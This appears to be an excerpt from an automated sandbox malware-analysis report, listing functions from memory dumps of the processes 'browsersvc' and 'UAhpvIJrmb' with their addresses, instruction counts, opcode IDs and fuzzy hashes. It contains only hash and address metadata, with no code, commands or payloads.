                  Function 00007FFD9BAB05A0 Relevance: .3, Instructions: 313COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction ID: 15239c11f37e7583b54517ae62b43cae25425d98d81673804ad9e4ecb8a0f75d
                  • Opcode Fuzzy Hash: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction Fuzzy Hash: 63913703B0F6E50BE33163ED2C751E96F50DF51769B0D42F7E0A88A0E7EC5866468785
                  Function 00007FFD9BAB060D Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction ID: 9cbc23ae92ba34ae3cedc5a3e7836bd34ad55450a3a53deb9423a9b9f6b947cd
                  • Opcode Fuzzy Hash: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction Fuzzy Hash: 5A814843B0F6E50BE33163ED2C751E96F90DF51769B0942FBE0A88A0E7EC586646C784
                  Function 00007FFD9BAB0638 Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction ID: e3549060fbc56a5a4b53d1cf68d266b33ac9b9b4d6eadc19f7f6dc09d3fc99b3
                  • Opcode Fuzzy Hash: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction Fuzzy Hash: 4C816853B0FAD50BE33067EC6C651E97F90EF51365B0942FBE0A8CA0E7EC54A6468784
                  Function 00007FFD9BAB0640 Relevance: .3, Instructions: 267COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction ID: 4947398d53e5c884a2d0fa4debc842be9b041fbdd788ba6d996f4eba676cd1e7
                  • Opcode Fuzzy Hash: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction Fuzzy Hash: E7715843B0F6D50BE33163EC2C751E96F90EF51765B0942FBE0A8890E7EC5466468784
                  Function 00007FFD9BAB0D66 Relevance: .2, Instructions: 221COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3f4e8caeadd6b46c8ea231971ee46a206c18c8531f6bccc366c6490f20a8915
                  • Instruction ID: af35241bc98197fea4c31aa84c685cfa975307be41b7fb01e2c6b77ef175d8f8
                  • Opcode Fuzzy Hash: e3f4e8caeadd6b46c8ea231971ee46a206c18c8531f6bccc366c6490f20a8915
                  • Instruction Fuzzy Hash: 5A71F331F09A1D8FEBA8DB68C865FEDB3A1EF54310F0142B9D01DD71A6DE74AA458B40
                  Function 00007FFD9BAB1DC2 Relevance: .2, Instructions: 217COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction ID: 1c108e673fdb4558083ef58de195676daf57c374a9b3a6eca3b81835e913364a
                  • Opcode Fuzzy Hash: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction Fuzzy Hash: 5B61B031B2CA594BDB58DF5C88A15B977E2FFE8304B15416EE45EC3296DE30A902CB81
                  Function 00007FFD9BAC4F50 Relevance: .2, Instructions: 152COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 460b6296304f303a84f5a017253220775de1fd5cff00f51b07488f0d5c769181
                  • Instruction ID: 0df8b5824df96c25e46c927a7c492a82d2440890a8c871d68d2ad4281f120d82
                  • Opcode Fuzzy Hash: 460b6296304f303a84f5a017253220775de1fd5cff00f51b07488f0d5c769181
                  • Instruction Fuzzy Hash: 75513270E09A1D9FEBA4EBA8C859ABDB7F1FF58300F11016DD01DE32A5DE7569418B40
                  Function 00007FFD9BAB31B1 Relevance: .1, Instructions: 145COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 358a3246b4b15edb741c23dc8cb7fc6c3ca99af9d1022126d2fe8fdaee2b8db2
                  • Instruction ID: 5e058002bfd338d6780d8f5aea8dc24b287e610eb8813d7ca9e2b7d8761bc103
                  • Opcode Fuzzy Hash: 358a3246b4b15edb741c23dc8cb7fc6c3ca99af9d1022126d2fe8fdaee2b8db2
                  • Instruction Fuzzy Hash: D1512B71E0A52E8FEB64EB98C4646EDBBF1FF58300F41417AD019E71A1DA786A44CF00
                  Function 00007FFD9BAB2135 Relevance: .1, Instructions: 141COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 84c940a0b7937a0602e0f4c4435a3966f5a6300358fb029c0a334d0397640b28
                  • Instruction ID: 46e672f8d9696a3d6b607035e5e9576ddb95a48e5c01069ce7b10a9099cd6cdf
                  • Opcode Fuzzy Hash: 84c940a0b7937a0602e0f4c4435a3966f5a6300358fb029c0a334d0397640b28
                  • Instruction Fuzzy Hash: AB417C31B0E75E0FD365DBB8A8651B87BD0EF86310F0545BBD46CC71B2DE68A9418741
                  Function 00007FFD9BAB2BFB Relevance: .1, Instructions: 110COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4457bbde0e37bb637b2575fb641090aa1b039a3fed293cb5af7c7d3a41db56b6
                  • Instruction ID: b569f575578c4251c558350d549b206fda08f6d16487d711e77ff449ad74d2cb
                  • Opcode Fuzzy Hash: 4457bbde0e37bb637b2575fb641090aa1b039a3fed293cb5af7c7d3a41db56b6
                  • Instruction Fuzzy Hash: 8D318416A0E2961AE321B3FC7C755E63F909F1623EF0942F3E5AD890E3ED086549C295
                  Function 00007FFD9BAB2BC0 Relevance: .1, Instructions: 106COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e9bf99f99b26c670b82ee09e8b260aa997b21c3bb6b444fb1a66edbc48d6c16
                  • Instruction ID: fb818604c15858e0cd456b6b6a88f07c879f4cf70b0046ae638e23c6a006ec7f
                  • Opcode Fuzzy Hash: 6e9bf99f99b26c670b82ee09e8b260aa997b21c3bb6b444fb1a66edbc48d6c16
                  • Instruction Fuzzy Hash: 9D31D422A0E79A1FE751A7B89C355E57FA0EF1231AF0A41F3D4588B0A3E9186548C751
                  Function 00007FFD9BAB0805 Relevance: .1, Instructions: 91COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 512a2f0a8e726a9f601bf589be42c2f4fea282d57c6d73b7d316033a5bcb8750
                  • Instruction ID: 660ad56e7b77de7951027f272d2c7b8ce459dae9c84b47dbeebd9fba01bc13ff
                  • Opcode Fuzzy Hash: 512a2f0a8e726a9f601bf589be42c2f4fea282d57c6d73b7d316033a5bcb8750
                  • Instruction Fuzzy Hash: A0219B62B0E69A57E73467FD9C392E93B90EF11759F0941BBD0ACC9093EC14A209C6C4
                  Function 00007FFD9BAB33A8 Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0f089f11b8413996d53cae0695e154b6fbb9f7a05cf69a8dfdc3467e09a895f
                  • Instruction ID: 6d4ba27b6b26c2aa9f950c1d08cc4ed172f81d5ba9ea1bcb79c6975c7706d45f
                  • Opcode Fuzzy Hash: e0f089f11b8413996d53cae0695e154b6fbb9f7a05cf69a8dfdc3467e09a895f
                  • Instruction Fuzzy Hash: DD21CF3094E69A4FD757ABB488685A93FF0EF0A300F0604F7D458CB0B2DA789545CB11
                  Function 00007FFD9BAB3287 Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd60ccfceac13f0dca681507ee4763c251168f331afd735786ebd34340aa31b4
                  • Instruction ID: 91f0a2c2b9c5d5e4a50f3628c6db814ac2ccfee693f177a94dbad4860302aa35
                  • Opcode Fuzzy Hash: cd60ccfceac13f0dca681507ee4763c251168f331afd735786ebd34340aa31b4
                  • Instruction Fuzzy Hash: B121C575E0962D8FEB64EBD8C8646ADBBF1FF58300F51416AD019E72A5CA786941CF00
                  Function 00007FFD9BAB0A01 Relevance: .1, Instructions: 68COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2931721c01dcc50c0c6996941a12c192037349fb9fb025f66956f048d8dd4128
                  • Instruction ID: 006eefd321f76f14604eacb7911265b2573cc90923a1c83f1e534b15f172afd9
                  • Opcode Fuzzy Hash: 2931721c01dcc50c0c6996941a12c192037349fb9fb025f66956f048d8dd4128
                  • Instruction Fuzzy Hash: 0611C831E1951E4FE7A0EBA8C8595FD7BE0FF58700F41497AD42CC70A6DE74A5408B40
                  Function 00007FFD9BAB11AD Relevance: .1, Instructions: 56COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23841dfde0d8dc4a1eda6aa305943b1662a16b905d38381ee9bb8014439ad7ed
                  • Instruction ID: ee2115d2536d8af7edbdb77e54d5f7305eee43e652841e64525e64d09c35d40e
                  • Opcode Fuzzy Hash: 23841dfde0d8dc4a1eda6aa305943b1662a16b905d38381ee9bb8014439ad7ed
                  • Instruction Fuzzy Hash: F311B631E1A55E4EEB68DBA484B96B97BE0FF65300F0104BEC029C60E1DE755640CB00
                  Function 00007FFD9BAB34D5 Relevance: .1, Instructions: 54COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cbb65223fe63aaeeaf8a0b5814d06c01984cad3131363e922303640473c54271
                  • Instruction ID: 8fbea79c47a541e375255fd7c3e3d51cb2060307ad4ec7f511f396a8be5c387f
                  • Opcode Fuzzy Hash: cbb65223fe63aaeeaf8a0b5814d06c01984cad3131363e922303640473c54271
                  • Instruction Fuzzy Hash: D6113070A0965E8FDB59EB64C8696B97BE0FF18300F4105BED42AD71A1DA75A5408B01
                  Function 00007FFD9BAB05D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bcf0178cc33d65ab78ae910031ed16e6dc7b82cf9254e3d232e094c84283f833
                  • Instruction ID: c54626af9d42008234e287b2f959746cc6b6b9af174913885b52e0da336c224c
                  • Opcode Fuzzy Hash: bcf0178cc33d65ab78ae910031ed16e6dc7b82cf9254e3d232e094c84283f833
                  • Instruction Fuzzy Hash: 8C01B530A1551E8FDB98EF65C4646B977E1FF69304F11447ED42EC21A4CE71A660CF40
                  Function 00007FFD9BAB282D Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54283e09cc6a928d1604451fac7a56aa81300e9c158df0e29469a32e73411b49
                  • Instruction ID: 5ff7b0a01c0c6b5cfcb559972f9c0810f3a8fdc06da580dd4a6ce75a43301412
                  • Opcode Fuzzy Hash: 54283e09cc6a928d1604451fac7a56aa81300e9c158df0e29469a32e73411b49
                  • Instruction Fuzzy Hash: C4018431E1A65E8FE765ABE494585F97FE0FF19300F4245B6D428C70B6EA74E1408B40
                  Function 00007FFD9BAB1C95 Relevance: .0, Instructions: 46COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aba7cb98aec31d6b4489360f8fd7b86eba44ab8ac8b8828cb3f12eed2c875e0e
                  • Instruction ID: c9f0e3c7128eb46733705e7cebbd78c7a11ce955e924bb669cd87154520ede07
                  • Opcode Fuzzy Hash: aba7cb98aec31d6b4489360f8fd7b86eba44ab8ac8b8828cb3f12eed2c875e0e
                  • Instruction Fuzzy Hash: EE01F93091A68E8FDB64DF54C4656F97BE0FF66300F51047EE82CC21A1DBB59560CB40
                  Function 00007FFD9BAB2EC9 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a03ebb7a6a051c68f52208847b547c9335d4f4438a0a2fe8f045d6792b3a5515
                  • Instruction ID: 0c9531adbdbc24fc17d9588cd9bb9ac4242b277f1e6bcb9c54e3ccb510a94087
                  • Opcode Fuzzy Hash: a03ebb7a6a051c68f52208847b547c9335d4f4438a0a2fe8f045d6792b3a5515
                  • Instruction Fuzzy Hash: B5018430A1E75E4FE752EBB494695A97FE0EF06304F4648B3D418C70B6DA38A5548B01
                  Function 00007FFD9BAB0610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6299ca2b821506c9df8edd4efd0561e31b7c9be7e151bb4f70008aa34d561aa9
                  • Instruction ID: 9f0ce233e7f39b9617662dcc88c2fcb9bb7c7a0a76a4d869a0d199ed9bf43c88
                  • Opcode Fuzzy Hash: 6299ca2b821506c9df8edd4efd0561e31b7c9be7e151bb4f70008aa34d561aa9
                  • Instruction Fuzzy Hash: F1018630A1961E8AEB58EFA4D4695B977A0FF18305F11487FD42EC21E5DF75A590CF00
                  Function 00007FFD9BAB0608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 321392d902f06d45130a8ce963414097f6abcea37ef7454fee53f66e7d76141b
                  • Instruction ID: 885c8a0fdb5bbbc0463b56b57e81f823b4afa3fbc260374ef72141c5bc0f841a
                  • Opcode Fuzzy Hash: 321392d902f06d45130a8ce963414097f6abcea37ef7454fee53f66e7d76141b
                  • Instruction Fuzzy Hash: 8F018130A1560E9FEB68EBA4D4686B97BA0FF18305F51487FD42EC61E5DE75A290CE00
                  Function 00007FFD9BAB05D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ccd194bde76f0e86f69451e824488fe3ce04a301f4ceab0eeb7bf6591c58934
                  • Instruction ID: 07b1b96750f68d79bc876f5ef795a2fecab04759570d4f6eefe12e8007493f38
                  • Opcode Fuzzy Hash: 6ccd194bde76f0e86f69451e824488fe3ce04a301f4ceab0eeb7bf6591c58934
                  • Instruction Fuzzy Hash: A2F0FC30A1A55E8FDB64EF65D4655FA77A0FF25308F11057AE82DC20E1CA75A660CF40
                  Function 00007FFD9BAB11C0 Relevance: .0, Instructions: 38COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction ID: 4b909795897e4bc5db432ea06dbaeb41d6741b1b11519fffe01b335dbcbe50ca
                  • Opcode Fuzzy Hash: 55608cc8436fc819b0a10414349869821e116019f6d13c6b76de32aa4d577744
                  • Instruction Fuzzy Hash: 08F0C831E2A56E4AEB649BE498796F976E0FF65304F00043ED42DC20E1EEB816548A40
                  Function 00007FFD9BAB2749 Relevance: .0, Instructions: 34COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction ID: 5177cb7cefb367cc54fd2e70e2ec01f83261ebe42577bfaed0bf921d0f361849
                  • Opcode Fuzzy Hash: 17aa570abdd84dbf9b398e33e14e97ca5ba5f6976663ebfb4a392eff48d3d2dd
                  • Instruction Fuzzy Hash: DFF0963191A38E8FDB699FA498641A93B60FF06304F4604BBD419C60E2DB786554CF01
                  Function 00007FFD9BAB27BD Relevance: .0, Instructions: 31COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction ID: 3ba21b3edb5d845a16340be4eac719a1db043e37d97f149c8553724190b8df43
                  • Opcode Fuzzy Hash: c4e4f49ce91a42fe14e71b20c314ab7cc7bf30bd8c6c226bc2dfdf9b1fe26550
                  • Instruction Fuzzy Hash: 0CF0F030A1E78E8FEB689FA088252A93FA0FF05300F0204BBD419C21E2DB7995908B01
                  Function 00007FFD9BAB434B Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07479a9427f1245ca480b36f48194c8bbb18d05b8a8e85b4956afd2d83bbe1fd
                  • Instruction ID: d12385edbcaf171eee7be92093b2e37f8d023eb208754288d7efe008b31cdc33
                  • Opcode Fuzzy Hash: 07479a9427f1245ca480b36f48194c8bbb18d05b8a8e85b4956afd2d83bbe1fd
                  • Instruction Fuzzy Hash: 17018870A5A22ACFEB60CF58C8607A8B6B1BB59300F1144E9D05DA2291CB75AA808F10
                  Function 00007FFD9BAB6966 Relevance: .0, Instructions: 13COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000002.1776409324.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9bab0000_browsersvc.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7b5741cfd53ba97432c2d74eacf356d8bb2aa2f8f95a50e675eeb55ba423b5cf
                  • Instruction ID: 4cf625da73c449d66b97e2b76199cbbd55eed984de9d8ceef0494129b892bf0e
                  • Opcode Fuzzy Hash: 7b5741cfd53ba97432c2d74eacf356d8bb2aa2f8f95a50e675eeb55ba423b5cf
                  • Instruction Fuzzy Hash: 32E07574E5622ADFEBA0CF589860AE8B6B1FB48310F1004E9D41DA3291DA75AA808F10

                  Executed Functions

                  Function 00007FFD9BAB3555 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_H
                  • API String ID: 0-372873180
                  • Opcode ID: 2fd1aefd1bc41e583bc0daeee1deb84f0df88a0dc9411d78c3f1880bae1385f5
                  • Instruction ID: 4e012dc62b28ae64cc6f7390743c578f6df0864de94b43e72051a6ef2d9ac0ec
                  • Opcode Fuzzy Hash: 2fd1aefd1bc41e583bc0daeee1deb84f0df88a0dc9411d78c3f1880bae1385f5
                  • Instruction Fuzzy Hash: 21A1C271A19A4E8FEB58DB68C8657AC7BE1FF59314F5002BAD01DCB2D6DFB528018B40
                  Function 00007FFD9BAC88E0 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_^1$L_^9$L_^M
                  • API String ID: 0-2753354998
                  • Opcode ID: 9f71f9f2c8c87c8e997f7902ee591e2382ec958fc12a3361be35081ea235598e
                  • Instruction ID: 6abcd92a645b0efd25199d9a5052d55795823e29a756688de777caba87baff31
                  • Opcode Fuzzy Hash: 9f71f9f2c8c87c8e997f7902ee591e2382ec958fc12a3361be35081ea235598e
                  • Instruction Fuzzy Hash: 00315932B0950D0AD728BBBCA8655FC3790FF5933AB0005BBD61ACB193EE256546CA91
                  Function 00007FFD9BAC88D0 Relevance: 3.8, Strings: 3, Instructions: 100COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_^1$L_^9$L_^M
                  • API String ID: 0-2753354998
                  • Opcode ID: e9258d45b0386fa8b53e2439fd9d296ffa1562be898848cb5894a9defdb342ac
                  • Instruction ID: 2cd83c436da5b32d83ae80c47fe0c1dc591234b8fb06ff69795218c5ba8051fc
                  • Opcode Fuzzy Hash: e9258d45b0386fa8b53e2439fd9d296ffa1562be898848cb5894a9defdb342ac
                  • Instruction Fuzzy Hash: 2A214923B091090AD328BBBCBC655FC3750FF5533AB0442B7E65E8A093EE242546C692
